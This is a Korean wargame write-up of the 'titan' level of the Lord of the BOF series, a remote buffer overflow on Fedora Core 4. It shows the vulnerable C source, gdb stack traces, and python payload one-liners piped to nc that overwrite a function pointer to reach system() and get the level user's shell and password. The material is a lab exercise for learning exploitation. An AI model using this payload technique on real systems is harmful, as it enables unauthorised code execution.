/*

        The Lord of the BOF : The Fellowship of the BOF

        - titan

        - Remote BOF on Fedora Core 4

        - hint : ? 

- port : TCP 8888

*/


#include <stdio.h>

#include <string.h>

#include <stdlib.h>

#include <unistd.h>


// Destination of the unbounded strcpy() in main(): 40 bytes, zero-initialized
// static storage (.bss).
static char buffer[40];

// Function pointer main() calls through last; set to print() before any input
// is read. It is a separate static object, so its position relative to
// `buffer` is decided by the linker — the writeup below observes it directly
// after `buffer`, which is why the copy overflow can reach it.
static void (*ftn)();


/* Default target of the `ftn` function pointer: emits a fixed line and flushes stdout. */
void print()
{
        fputs("nothing here\n", stdout);
        fflush(stdout);
}


/*
 * Entry point of the challenge service. Reads one line from stdin into a
 * 48-byte stack buffer, copies it unbounded into the 40-byte static `buffer`,
 * vets the resulting value of `ftn`, clears `buffer`, then calls through `ftn`.
 *
 * Defects (intentional for the exercise, but what a fix would address):
 *  - strcpy() can write up to 8 bytes past the end of `buffer`: fgets() may
 *    store 47 characters plus the terminator (48 bytes) and `buffer` holds 40.
 *    A bounded copy, snprintf(buffer, sizeof buffer, "%s", buf), closes that.
 *  - fgets()'s return value is not checked, so on EOF/error the uninitialized
 *    `buf` is what gets copied.
 *  - No return statement; C99+ treats falling off the end of main() as return 0.
 */
int main()

{

        char buf[48];

        ftn = print;


        printf("titan : What a tragic mistake.\n");

        printf("you : ");

        fflush(stdout);


// Read at most 47 bytes (plus NUL) into the stack buffer; result unchecked.

        fgets(buf,48,stdin);


// Unbounded copy: source can be 48 bytes, destination is 40. The excess lands
// in whatever follows `buffer` in .bss (the static `ftn`, per this layout).

        strcpy(buffer,buf);


// Rejects a pointer whose most-significant byte is zero (a 32-bit-pointer
// assumption via the (int) cast). This is a value check on `ftn`, not
// control-flow integrity: any address with a non-zero top byte still passes.

        if(((int)ftn & 0xff000000) == 0)

        {

                printf("I've an allergy to NULL");

                exit(1);

        }


// Zeroes only the 40 bytes of `buffer`; bytes strcpy() placed beyond it are untouched.

memset(buffer, 0, 40);


// Indirect call through the static pointer, holding whatever survived the copy and the check.

        ftn();

}


소스코드를 살펴보면 지역변수 buf에 fgets함수를 이용하여 값을 입력한다.

그리고 strcpy함수로 전역변수 buffer에 복사하는데 이 때 오버플로우가 발생한다.

또 조건이 있는데, ftn 함수 포인터가 라이브러리 함수의 주소로 덮어써지면 안 된다.

그 후 memset함수를 이용하여 전역변수 buffer를 40바이트 클리어 시켜준 후 ftn()를 호출한다.



여기서 오버플로우로 인해 ftn함수의 주소를 조작할 수 있다.

초기화되지 않은 전역변수는 .bss 영역에 있으므로, 오버플로우가 제대로 됐는지 확인해 보자.







(python -c 'print "A"*48';cat) | (python -c 'print "r"';cat) | (python -c 'print "b* main+171"';cat) | gdb -q 3itan 




<memset 한 후 .bss영역>






현재 할 수 있는 것은 전역변수를 오버플로우 시켜서 ftn함수의 주소를 바꾸는 것 뿐이다.

그마저도 라이브러리 함수를 사용하지 못하기 때문에 RTL 공격을 할 수 없다.


도저히 어떻게 해야할지 모르겠어서 write up을 보았더니 

code reuse attack 을 이용하여 공략했다. code reuse attack은 해당 프로그램의 TEXT영역의 코드를 이용하여 프로그램의

흐름을 조작해 원하는 결과를 얻는 공격 방식이다.





ftn() 의 주소를 0x0804854a로 오버라이팅을 시켜서 흐름을 바꿔주었다.

그로 인해 esp는 더 높은 주소 방향으로 이동한다.

그리하여 다음과 같은 공격이 가능해진다.










[enigma@Fedora_2ndFloor ~]$ (python -c 'print "B"*8+"\xe7\xb0\x7d\x00"+"BBBB"+"\x87\xd9\x8b\x00"';cat)|(python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) |(python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) | (python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) | (python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) > aa



[enigma@Fedora_2ndFloor ~]$ gdb -q 3itan 
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) b* main+88
Breakpoint 1 at 0x804854d
(gdb) disp/5i $eip
(gdb) disp/28wx $esp
(gdb) r<aa
Starting program: /home/enigma/3itan <aa
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0xbc1000
(no debugging symbols found)
(no debugging symbols found)
titan : What a tragic mistake.
you : 
Breakpoint 1, 0x0804854d in main ()
2: x/28xw $esp
0xbffd0150: 0x00000000 0x00000000 0xbffd1c23 0x08048456
0xbffd0160: 0x00000000 0x080497a8 0xbffd0178 0x08048395
0xbffd0170: 0x008caff4 0x008cc360 0xbffd0198 0x080485de
0xbffd0180: 0x008caff4 0x00000001 0x00000000 0x008caff4
0xbffd0190: 0x007a2ca0 0x080485c4 0xbffd01f8 0x007bad7f
0xbffd01a0: 0x00000001 0xbffd0224 0xbffd022c 0xbffd01e0
0xbffd01b0: 0x00795898 0x007a3878 0xb7fd2690 0x00000001
1: x/5i $eip
0x804854d <main+88>: mov    0x80497e4,%eax
0x8048552 <main+93>: sub    $0x4,%esp
0x8048555 <main+96>: push   %eax
0x8048556 <main+97>: push   $0x30
0x8048558 <main+99>: lea    0xffffffcc(%ebp),%eax
(gdb) c
Continuing.

Breakpoint 1, 0x0804854d in main ()
2: x/28xw $esp
0xbffd015c: 0x08048456 0x00000000 0x41414141 0x41414141
0xbffd016c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffd017c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffd018c: 0x0804854a 0x007a000a 0x080485c4 0xbffd01f8
0xbffd019c: 0x007bad7f 0x00000001 0xbffd0224 0xbffd022c
0xbffd01ac: 0xbffd01e0 0x00795898 0x007a3878 0xb7fd2690
0xbffd01bc: 0x00000001 0x008caff4 0x007a2ca0 0x080485c4
1: x/5i $eip
0x804854d <main+88>: mov    0x80497e4,%eax
0x8048552 <main+93>: sub    $0x4,%esp
0x8048555 <main+96>: push   %eax
0x8048556 <main+97>: push   $0x30
0x8048558 <main+99>: lea    0xffffffcc(%ebp),%eax
(gdb) b* fgets+242  // fgets함수 ret부분
Breakpoint 2 at 0x7fb272
(gdb) c
Continuing.

Breakpoint 2, 0x007fb272 in fgets () from /lib/libc.so.6
2: x/28xw $esp
0xbffd0148: 0x08048561 0xbffd0164 0x00000030 0x008cb740
0xbffd0158: 0xbffd1c23 0x08048456 0x00000000 0x41414141
0xbffd0168: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffd0178: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffd0188: 0x41414141 0x0804854a 0x007a000a 0x080485c4
0xbffd0198: 0xbffd01f8 0x007bad7f 0x00000001 0xbffd0224
0xbffd01a8: 0xbffd022c 0xbffd01e0 0x00795898 0x007a3878
1: x/5i $eip
0x7fb272 <fgets+242>: ret    
0x7fb273 <fgets+243>: mov    (%edi),%edx
0x7fb275 <fgets+245>: test   $0x20,%dl
0x7fb278 <fgets+248>: jne    0x7fb2a6 <fgets+294>
0x7fb27a <fgets+250>: movb   $0x0,(%esi,%ecx,1)
(gdb) c
Continuing.

Breakpoint 1, 0x0804854d in main ()
2: x/28xw $esp
0xbffd0168: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffd0178: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffd0188: 0x41414141 0x0804854a 0x007a000a 0x080485c4
0xbffd0198: 0xbffd01f8 0x007bad7f 0x00000001 0xbffd0224
0xbffd01a8: 0xbffd022c 0xbffd01e0 0x00795898 0x007a3878
0xbffd01b8: 0xb7fd2690 0x00000001 0x008caff4 0x007a2ca0
0xbffd01c8: 0x080485c4 0xbffd01f8 0xbffd01a0 0x007bad44
1: x/5i $eip
0x804854d <main+88>: mov    0x80497e4,%eax
0x8048552 <main+93>: sub    $0x4,%esp
0x8048555 <main+96>: push   %eax
0x8048556 <main+97>: push   $0x30
0x8048558 <main+99>: lea    0xffffffcc(%ebp),%eax
(gdb) c
Continuing.

Breakpoint 2, 0x007fb272 in fgets () from /lib/libc.so.6
2: x/28xw $esp
0xbffd0154: 0x08048561 0xbffd0164 0x00000030 0x008cb740
0xbffd0164: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffd0174: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffd0184: 0x41414141 0x41414141 0x0804854a 0x007a000a
0xbffd0194: 0x080485c4 0xbffd01f8 0x007bad7f 0x00000001
0xbffd01a4: 0xbffd0224 0xbffd022c 0xbffd01e0 0x00795898
0xbffd01b4: 0x007a3878 0xb7fd2690 0x00000001 0x008caff4
1: x/5i $eip
0x7fb272 <fgets+242>: ret    
0x7fb273 <fgets+243>: mov    (%edi),%edx
0x7fb275 <fgets+245>: test   $0x20,%dl
0x7fb278 <fgets+248>: jne    0x7fb2a6 <fgets+294>
0x7fb27a <fgets+250>: movb   $0x0,(%esi,%ecx,1)
(gdb) c
Continuing.

Breakpoint 1, 0x0804854d in main ()
2: x/28xw $esp
0xbffd0174: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffd0184: 0x41414141 0x41414141 0x0804854a 0x007a000a
0xbffd0194: 0x080485c4 0xbffd01f8 0x007bad7f 0x00000001
0xbffd01a4: 0xbffd0224 0xbffd022c 0xbffd01e0 0x00795898
0xbffd01b4: 0x007a3878 0xb7fd2690 0x00000001 0x008caff4
0xbffd01c4: 0x007a2ca0 0x080485c4 0xbffd01f8 0xbffd01a0
0xbffd01d4: 0x007bad44 0x00000000 0x00000000 0x00000000
1: x/5i $eip
0x804854d <main+88>: mov    0x80497e4,%eax
0x8048552 <main+93>: sub    $0x4,%esp
0x8048555 <main+96>: push   %eax
0x8048556 <main+97>: push   $0x30
0x8048558 <main+99>: lea    0xffffffcc(%ebp),%eax
(gdb) c
Continuing.

Breakpoint 2, 0x007fb272 in fgets () from /lib/libc.so.6
2: x/28xw $esp
0xbffd0160: 0x08048561 0x41414141 0x41414141 0x41414141
0xbffd0170: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffd0180: 0x41414141 0x41414141 0x41414141 0x0804854a
0xbffd0190: 0x007a000a 0x080485c4 0xbffd01f8 0x007bad7f
0xbffd01a0: 0x00000001 0xbffd0224 0xbffd022c 0xbffd01e0
0xbffd01b0: 0x00795898 0x007a3878 0xb7fd2690 0x00000001
0xbffd01c0: 0x008caff4 0x007a2ca0 0x080485c4 0xbffd01f8
1: x/5i $eip
0x7fb272 <fgets+242>: ret    
0x7fb273 <fgets+243>: mov    (%edi),%edx
0x7fb275 <fgets+245>: test   $0x20,%dl
0x7fb278 <fgets+248>: jne    0x7fb2a6 <fgets+294>
0x7fb27a <fgets+250>: movb   $0x0,(%esi,%ecx,1)
(gdb) c
Continuing.

Breakpoint 1, 0x0804854d in main ()
2: x/28xw $esp
0xbffd0180: 0x41414141 0x41414141 0x41414141 0x0804854a
0xbffd0190: 0x007a000a 0x080485c4 0xbffd01f8 0x007bad7f
0xbffd01a0: 0x00000001 0xbffd0224 0xbffd022c 0xbffd01e0
0xbffd01b0: 0x00795898 0x007a3878 0xb7fd2690 0x00000001
0xbffd01c0: 0x008caff4 0x007a2ca0 0x080485c4 0xbffd01f8
0xbffd01d0: 0xbffd01a0 0x007bad44 0x00000000 0x00000000
0xbffd01e0: 0x00000000 0x0079ae60 0x0079613d 0x007a2fb4
1: x/5i $eip
0x804854d <main+88>: mov    0x80497e4,%eax
0x8048552 <main+93>: sub    $0x4,%esp
0x8048555 <main+96>: push   %eax
0x8048556 <main+97>: push   $0x30
0x8048558 <main+99>: lea    0xffffffcc(%ebp),%eax
(gdb) c
Continuing.

Breakpoint 2, 0x007fb272 in fgets () from /lib/libc.so.6
2: x/28xw $esp
0xbffd016c: 0x007db0e7 0x42424242 0x008bd987 0x008c000a
0xbffd017c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffd018c: 0x0804854a 0x007a000a 0x080485c4 0xbffd01f8
0xbffd019c: 0x007bad7f 0x00000001 0xbffd0224 0xbffd022c
0xbffd01ac: 0xbffd01e0 0x00795898 0x007a3878 0xb7fd2690
0xbffd01bc: 0x00000001 0x008caff4 0x007a2ca0 0x080485c4
0xbffd01cc: 0xbffd01f8 0xbffd01a0 0x007bad44 0x00000000
1: x/5i $eip
0x7fb272 <fgets+242>: ret    // fgets함수의 ret과 main함수의 buf영역과 겹친다. 그래서 그 부분을 system함수 주소를 덮어씌워 공격함.
0x7fb273 <fgets+243>: mov    (%edi),%edx
0x7fb275 <fgets+245>: test   $0x20,%dl
0x7fb278 <fgets+248>: jne    0x7fb2a6 <fgets+294>
0x7fb27a <fgets+250>: movb   $0x0,(%esi,%ecx,1)
(gdb) x/i 0x007db0e7
0x7db0e7 <system>: push   %edi







The program is running.  Exit anyway? (y or n) y

[enigma@Fedora_2ndFloor ~]$ (python -c 'print "B"*8+"\xe7\xb0\x7d\x00"+"BBBB"+"\x87\xd9\x8b\x00"';cat)|(python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) |(python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) | (python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) | (python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) | nc localhost 8888

titan : What a tragic mistake.

you : id

uid=503(titan) gid=503(titan) context=system_u:system_r:inetd_t

my-pass

euid = 503

out of the night


[titan@Fedora_2ndFloor ~]$ cat dropped_item.txt 

                   ,.

                 ,'  `.

               ,' _<>_ `.

             ,'.-'____`-.`.

           ,'_.-''    ``-._`.

         ,','      /\      `.`.

       ,' /.._  O /  \ O  _.,\ `.

     ,'/ /  \ ``-;.--.:-'' /  \ \`.

   ,' : :    \  /\`.,'/\  /    : : `.

  < <>| |   O >(< (  ) >)< O   | |<> >

   `. : :    /  \/,'`.\/  \    ; ; ,'

     `.\ \  /_..-:`--';-.._\  / /,'

       `. \`'   O \  / O   `'/ ,'

         `.`._     \/     _,','

           `..``-.____.-'',,'

             `.`-.____.-','

               `.  <>  ,'

                 `.  ,' 

                   `'



ps. 풀기 전에 너무 헤맸다.. 다 풀고 보니 안 어려워 보이지만 풀기까지 엄청 삽질했다..



